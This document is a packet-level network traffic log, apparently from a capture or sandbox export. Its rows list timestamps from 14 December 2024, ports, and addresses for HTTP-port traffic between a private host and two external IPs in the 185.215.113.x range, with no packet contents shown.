Dec 14, 2024 12:56:34.320831060 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.320908070 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.320961952 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.320961952 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.320997000 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.321010113 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.321050882 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.400816917 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.400881052 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.400963068 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.401015997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.401357889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.401410103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.401587963 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.401642084 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.401727915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.401905060 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.402919054 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.402976036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.403131008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.403186083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.404055119 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.404221058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.404280901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.405313969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.405370951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.405441999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.405495882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.406344891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.406400919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.406471014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.406523943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.407481909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.407538891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.407609940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.407776117 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.408735991 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.408803940 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.408951998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.409682035 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.409959078 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.410013914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.410135031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.410197973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.411041021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.411092997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.411154985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.411214113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.412214041 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.412342072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.412384987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.412415028 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.413441896 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.413507938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.413600922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.413651943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.414617062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.414680004 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.414748907 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.414804935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.415786028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.415838957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.415884972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.415932894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.416860104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.416915894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.416970015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.417021036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.418057919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.418152094 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.418207884 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.419228077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.419284105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.419342041 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.419389963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.420399904 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.420450926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.420502901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.420589924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.421644926 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.421703100 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.422004938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.422056913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.422827959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.422878981 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.422903061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.422952890 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.423943996 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.423991919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.424043894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.424093962 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.425143003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.425220966 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.425249100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.425301075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.426347971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.426399946 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.426445961 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.426496983 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.427491903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.427560091 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.427568913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.427615881 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.428670883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.428729057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.428781986 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.428843021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.429821014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.429877996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.429951906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.430010080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.431037903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.431091070 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.431155920 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.431211948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.432249069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.432302952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.432322979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.432378054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.433356047 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.433412075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.433478117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.433536053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.434587955 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.434643030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.434690952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.434747934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.435762882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.435822964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.435880899 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.435933113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.436918020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.436971903 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.437052965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.437108994 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.438144922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.438245058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.438246012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.438299894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.439291000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.439441919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.439490080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.440437078 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.440490961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.440572023 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.440627098 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.441647053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.441700935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.441781998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.441837072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.442792892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.442847967 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.442929029 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.443087101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.444077015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.444133997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.444150925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.444202900 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.445266962 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.445302963 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.445328951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.445363045 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.446409941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.446460009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.446464062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.446511030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.447555065 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.447609901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.447633028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.447688103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.448749065 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.448805094 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.448898077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.449024916 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.449918032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.450001955 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.450020075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.450074911 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.451097965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.451159954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.451173067 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.451225996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.452244997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.452299118 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.452394009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.452447891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.453409910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.453465939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.453536987 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.453592062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.454549074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.454631090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.454775095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.454839945 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.455770969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.455823898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.456022978 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.456075907 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.456945896 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.457001925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.457039118 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.457093954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.458226919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.458282948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.458354950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.458441019 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.459403038 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.459458113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.459491014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.459642887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.460634947 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.460699081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.460735083 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.460793018 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.461816072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.461873055 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.461888075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.461945057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.512703896 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.512769938 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.514286995 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.593127966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.593189955 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.593285084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.593339920 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.593687057 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.593745947 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.593782902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.593844891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.594912052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.594964981 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.595277071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.595347881 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.595411062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.595467091 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.596508026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.596564054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.596651077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.596705914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.597647905 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.597702026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.597773075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.597826958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.598803997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.598861933 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.598936081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.598988056 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.599999905 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.600085020 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.600136042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.600191116 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.601218939 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.601279974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.601306915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.601360083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.602353096 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.602428913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.602485895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.602570057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.603791952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.603857994 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.603893042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.603941917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.604873896 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.604929924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.604933023 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.604986906 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.605909109 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.605957031 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.606091976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.606142998 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.607058048 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.607157946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.607172966 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.607204914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.608297110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.608314037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.608350992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.608382940 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.609442949 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.609494925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.609549999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.609597921 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.610563993 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.610685110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.610735893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.611758947 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.611809015 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.611912012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.611968040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.613035917 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.613087893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.613090038 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.613133907 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.614170074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.614222050 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.614273071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.614372969 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.615330935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.615385056 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.615433931 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.615485907 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.616466045 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.616518021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.616595984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.616642952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.617708921 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.617760897 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.617860079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.617909908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.618812084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.618871927 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.618916035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.618971109 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.620022058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.620078087 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.620078087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.620127916 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.621165037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.621229887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.621264935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.621314049 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.622385025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.622437954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.622477055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.622525930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.623593092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.623646021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.623699903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.623768091 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.624730110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.624783993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.624844074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.624902010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.625905991 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.625957966 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.625993967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.626043081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.627082109 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.627131939 CET	49827	80	192.168.2.4	185.215.113.16
